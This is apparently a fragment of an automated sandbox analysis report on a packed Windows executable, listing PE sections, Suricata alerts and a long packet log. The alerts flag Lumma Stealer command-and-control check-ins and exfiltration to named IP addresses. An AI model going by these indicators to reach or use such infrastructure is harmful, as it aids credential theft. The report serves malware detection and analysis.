                                                                                                                                                                                  .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  0x590000x2a40000x200dd6c7efc1a35ccedb7f1847a2cd9fda0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  jvnpwyzl0x2fd0000x1990000x198e00a285b46b9978d9d0e21e7c456d60d6dfFalse0.9948260996254968OpenPGP Public Key7.954011898196479IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  ubzpnpef0x4960000x10000x6000440d17e1df08feb4e34ce719b56f61dFalse0.625data5.265247571474017IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  .taggant0x4970000x30000x2200799e1bd17843456cc5ca3497c84c428aFalse0.06675091911764706DOS executable (COM)0.8963578087434667IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                  RT_MANIFEST0x495ba40x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                                  DLLImport
                                                                                                                                                                                  kernel32.dlllstrcpy
                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                  2024-11-23T14:46:12.133339+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730172.67.162.84443TCP
                                                                                                                                                                                  2024-11-23T14:46:12.838034+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730172.67.162.84443TCP
                                                                                                                                                                                  2024-11-23T14:46:12.838034+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730172.67.162.84443TCP
                                                                                                                                                                                  2024-11-23T14:46:14.185710+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731172.67.162.84443TCP
                                                                                                                                                                                  2024-11-23T14:46:14.904779+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731172.67.162.84443TCP
                                                                                                                                                                                  2024-11-23T14:46:14.904779+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731172.67.162.84443TCP
                                                                                                                                                                                  2024-11-23T14:46:16.736896+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732172.67.162.84443TCP
                                                                                                                                                                                  2024-11-23T14:46:17.806600+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449732172.67.162.84443TCP
                                                                                                                                                                                  2024-11-23T14:46:19.270177+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733172.67.162.84443TCP
                                                                                                                                                                                  2024-11-23T14:46:21.797673+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734172.67.162.84443TCP
                                                                                                                                                                                  2024-11-23T14:46:24.444969+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735172.67.162.84443TCP
                                                                                                                                                                                  2024-11-23T14:46:27.216789+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.67.162.84443TCP
                                                                                                                                                                                  2024-11-23T14:46:36.343049+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743172.67.162.84443TCP
                                                                                                                                                                                  2024-11-23T14:46:37.052468+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449743172.67.162.84443TCP
                                                                                                                                                                                  2024-11-23T14:46:38.512314+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449744185.215.113.1680TCP
                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Nov 23, 2024 14:46:10.787996054 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:10.788064957 CET44349730172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:10.788146973 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:10.814069986 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:10.814095020 CET44349730172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:12.133219957 CET44349730172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:12.133338928 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:12.137751102 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:12.137784004 CET44349730172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:12.138477087 CET44349730172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:12.182053089 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:12.234196901 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:12.234250069 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:12.234472990 CET44349730172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:12.463327885 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                                  Nov 23, 2024 14:46:12.838114977 CET44349730172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:12.838360071 CET44349730172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:12.838469982 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:12.868143082 CET49730443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:12.868174076 CET44349730172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:12.934716940 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:12.934771061 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:12.934868097 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:12.935173035 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:12.935194016 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:14.185592890 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:14.185709953 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:14.211914062 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:14.211956024 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:14.212702036 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:14.214808941 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:14.214831114 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:14.214975119 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:14.904829979 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:14.905034065 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:14.905092955 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:14.905129910 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:14.905240059 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:14.905288935 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:14.905296087 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:14.921170950 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:14.921226025 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:14.921250105 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:14.927654982 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:14.927704096 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:14.927716970 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:14.978936911 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:14.978955030 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:15.025815964 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:15.025835991 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:15.072690964 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:15.072710037 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:15.101681948 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:15.101773977 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:15.101800919 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:15.101823092 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:15.101908922 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:15.102041006 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:15.102083921 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:15.102108955 CET49731443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:15.102123022 CET44349731172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:15.418576002 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:15.418678999 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:15.418772936 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:15.419141054 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:15.419179916 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:16.736824989 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:16.736896038 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:16.767656088 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:16.767684937 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:16.768323898 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:16.787048101 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:16.790848017 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:16.790883064 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:16.790955067 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:16.790962934 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:17.806634903 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:17.806770086 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:17.806844950 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:17.807003021 CET49732443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:17.807022095 CET44349732172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:18.005165100 CET49733443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:18.005295992 CET44349733172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:18.005420923 CET49733443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:18.005889893 CET49733443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:18.005971909 CET44349733172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:19.270068884 CET44349733172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:19.270176888 CET49733443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:19.271754980 CET49733443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:19.271770000 CET44349733172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:19.272094965 CET44349733172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:19.273466110 CET49733443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:19.273597002 CET49733443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:19.273627043 CET44349733172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:20.155594110 CET44349733172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:20.155715942 CET44349733172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:20.155786991 CET49733443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:20.155972958 CET49733443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:20.156016111 CET44349733172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:20.582344055 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:20.582405090 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:20.582498074 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:20.582904100 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:20.582922935 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:21.797557116 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:21.797672987 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:21.799232006 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:21.799268961 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:21.799628973 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:21.801000118 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:21.801158905 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:21.801209927 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:21.801295996 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:21.801314116 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:22.779865980 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:22.780003071 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:22.780083895 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:22.780266047 CET49734443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:22.780303955 CET44349734172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:23.145545959 CET49735443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:23.145621061 CET44349735172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:23.145709991 CET49735443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:23.146075964 CET49735443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:23.146121979 CET44349735172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:24.444726944 CET44349735172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:24.444968939 CET49735443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:24.446523905 CET49735443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:24.446577072 CET44349735172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:24.447125912 CET44349735172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:24.451348066 CET49735443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:24.451582909 CET49735443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:24.451611996 CET44349735172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:25.179842949 CET44349735172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:25.179960012 CET44349735172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:25.180123091 CET49735443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:25.180193901 CET49735443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:25.796391964 CET49736443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:46:25.796423912 CET4434973620.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:25.796974897 CET49736443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:46:25.798892021 CET49736443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:46:25.798908949 CET4434973620.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:25.955117941 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:25.955213070 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:25.955571890 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:25.955979109 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:25.956001997 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:27.216567039 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:27.216789007 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.226147890 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.226226091 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:27.226702929 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:27.242846012 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.243488073 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.243702888 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:27.243832111 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.243885994 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:27.244033098 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.244106054 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:27.244283915 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.244340897 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:27.244539976 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.244587898 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:27.244843960 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.244895935 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:27.244930029 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.245192051 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.245255947 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.287379980 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:27.287754059 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.287877083 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.287925005 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.331378937 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:27.331799984 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.331923962 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.332000971 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.375437021 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:27.375663042 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:27.377954960 CET4434973620.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:27.378031015 CET49736443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:46:27.380964994 CET49736443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:46:27.380975962 CET4434973620.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:27.381381035 CET4434973620.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:27.419373035 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:27.432069063 CET49736443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:46:27.571793079 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:29.432209969 CET49736443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:46:29.440573931 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                                                  Nov 23, 2024 14:46:29.479342937 CET4434973620.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:29.744575024 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                                                  Nov 23, 2024 14:46:29.905145884 CET8049723199.232.210.172192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:29.905190945 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                                                  Nov 23, 2024 14:46:30.145323992 CET8049723199.232.210.172192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:30.302432060 CET4434973620.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:30.302468061 CET4434973620.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:30.302476883 CET4434973620.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:30.302551031 CET49736443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:46:30.302556038 CET4434973620.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:30.302601099 CET4434973620.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:30.302627087 CET4434973620.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:30.302655935 CET4434973620.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:30.302671909 CET49736443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:46:30.302671909 CET49736443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:46:30.302671909 CET49736443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:46:30.302695990 CET49736443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:46:30.322834969 CET4434973620.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:30.322952032 CET49736443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:46:30.322953939 CET4434973620.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:30.323000908 CET49736443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:46:31.771804094 CET49736443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:46:31.771846056 CET4434973620.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:31.771859884 CET49736443192.168.2.420.12.23.50
                                                                                                                                                                                  Nov 23, 2024 14:46:31.771867990 CET4434973620.12.23.50192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:35.063772917 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:35.063889980 CET44349737172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:35.064080954 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:35.064080954 CET49737443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:35.076627016 CET49743443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:35.076662064 CET44349743172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:35.076736927 CET49743443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:35.077044010 CET49743443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:35.077059984 CET44349743172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:36.342943907 CET44349743172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:36.343049049 CET49743443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:36.346909046 CET49743443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:36.346924067 CET44349743172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:36.347280025 CET44349743172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:36.357069969 CET49743443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:36.357134104 CET49743443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:36.357323885 CET44349743172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:37.052536964 CET44349743172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:37.052803040 CET44349743172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:37.052874088 CET49743443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:37.052918911 CET49743443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:37.052937984 CET44349743172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:37.052951097 CET49743443192.168.2.4172.67.162.84
                                                                                                                                                                                  Nov 23, 2024 14:46:37.052959919 CET44349743172.67.162.84192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:37.056195021 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:37.176033974 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:37.176115990 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:37.176249027 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:37.297064066 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.512197971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.512236118 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.512314081 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                  Nov 23, 2024 14:46:38.512775898 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.512805939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:46:38.512815952 CET8049744185.215.113.16192.168.2.4
